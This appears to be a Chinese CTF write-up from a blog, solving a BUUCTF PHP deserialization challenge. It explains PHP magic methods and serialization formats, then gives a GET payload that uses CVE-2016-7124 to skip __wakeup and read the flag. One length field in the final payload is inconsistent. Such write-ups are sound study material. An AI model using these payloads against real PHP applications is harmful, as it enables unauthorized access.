当前位置：首页 > article >正文

BUUCTF-web刷题篇(6)

article 2026/2/15 18:53:00

15.PHP

知识点：

①__wakeup()//将在反序列化之后立即调用（当反序列化时变量个数与实际不符是会绕过）我们可以通过一个cve来绕过:CVE-2016-7124。将Object中表示数量的字段改成比实际字段大的值即可绕过wakeup函数。条件：PHP5<5.6.25,PHP7<7.0.10，或者PHP 7.3.4。

②__construct()//当对象被创建即new之前，会触发进行初始化，但在unserialize()时是不会自动调用的。

③__destruct()//在到某个对象的所有引用都被删除或者当对象被显式销毁时执行或者当所有的操作正常执行完毕之后，需要释放序列化的对象即在脚本结束时（非unset）php才会销毁引用，一般来说在脚本正常结束之前运行。如果抛出异常就不会调用。

④protected声明的字段为保护字段，在所声明的类和该类的子类中可见，但在该类的对象实例中不可见，也就不能输出。因此保护类的变量在序列化时，前面会加上\0*\0的前缀。这里的\0表示ASCII码为0的字符（不可见字符），而不是\0组合。计算长度时\0(%00)算做一个字符。url中用%00代替。

⑤private声明的字段为私有字段，只在所声明的类中可见，在该类的子类和该类的对象实例中均不可见，也就不能输出。因此私有类的变量在序列化时，前面都会加上\0类名\0的前缀。计算长度时\0(%00)算作一个字符。url中用%00代替。

⑥public无标记，变量名不变。s:2:"op";i:2;

⑦protected在变量名前添加标记\00*\00。s:5:"\00*\00op";i:2;

⑧private在变量名前添加标记\00类名\00。s:17:"\00类名\00op";i:2;

分析：页面只显示有网站备份，猜测是www.zip，或者直接用dirsearch或者御剑扫描。

下载文件，解压打开。

flag.php

尝试过后不是正确的flag。

index.php：显示包含了class.php文件，并且有一个反序列化点，应该就是php反序列化的问题。

class.php

<?php
include 'flag.php';error_reporting(0);class Name{private $username = 'nonono';private $password = 'yesyes';public function __construct($username,$password){$this->username = $username;$this->password = $password;}function __wakeup(){$this->username = 'guest';}function __destruct(){if ($this->password != 100) {echo "</br>NO!!!hacker!!!</br>";echo "You name is: ";echo $this->username;echo "</br>";echo "You password is: ";echo $this->password;echo "</br>";die();}if ($this->username === 'admin') {global $flag;echo $flag;}else{echo "</br>hello my friend~~</br>sorry i can't give you the flag!";die();}}
}
?>

发现在__destruct()中有个输出$flag变量的代码。那么思路就是将对象序列化并且修改username的值为admin，传参给select即可。但是我们发现调用__destruct()方法之前会调用__wakeup()方法，修改username的值为guest。那么重点就是绕过这个__wakeup()方法，只要满足反序列化时变量个数与实际不符就可以绕过。

因为当password!=100时，会进入if语句，die()结束程序，而无法输出flag，所以需要将password的值修改为100。

方法：

<?php
class Name{private $username = 'admin';private $password = '100';}echo serialize(new Name());
?>

输出序列化字符串：

O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}

这里我们发现Nameusername与前面的14不对应，少了两个字符，而Namepassword也少了两个字符，这是因为username和password变量是private类型，变量中的类名前后会有空白符，而复制的时候会丢失，所以还需要加上%00。并且为了绕过__wakeup()，还要将Name后面的数字修改为大于2的数。

结果为：

O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}

get传参：

?select=O:3:"Name":4:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}

得到flag

（思路：在class.php中发现反序列化函数，写序列化函数将对象转化为字符串，通过get方式以select为载体得到该字符串，调用反序列化函数，调用的过程中会自动调用__wakeup()函数，所以通过反序列化变量个数与实际不符绕过__wakeup()函数，最终输出flag）

BUUCTF-web刷题篇(6)

15.PHP

相关文章：

BUUCTF-web刷题篇(6)

AIP-203 域行为文档

在 Cloud Run 上使用 Gemini API 构建聊天应用

周总结aa

31天Python入门——第17天:初识面向对象

计算机视觉准备八股中

【C语言】文件操作（2）

CCCC天梯赛L1-094 剪切粘贴

C语言：多线程

livekit ICE连接失败的一些总结

Python神经网络1000个案例算法汇总

某地81栋危房自动化监测试点项目

远程装个Jupyter-AI协作笔记本，Jupyter容器镜像版本怎么选？安装部署教程

python文件的基本操作和文件读写

山东大学软件学院项目创新实训开发日志（4）之中医知识问答数据存储、功能结构、用户界面初步设计

20.思科交换机二层链路聚合的详细配置命令解析

【FreeRtos】随手记录想法和DeepSeek的交流

【多线程】单例模式和阻塞队列

Qt5.14.2+Cmake使用mingw64位编译opencv4.5成功图文教程

Transformer习题

Mamba4D阅读

uWebSockets开发入门

x265不同preset级别控制的编码参数与编码性能影响

Qt图形化界面为何总被“冷落“？

手工排查后门木马的常用姿势

算法导论（动态规划）——简单多状态

Linux 部署 rocketmq centos7

LeetCode 438. 找到字符串中所有字母的异位词

C++STL---＜functional＞

java详细笔记总结持续完善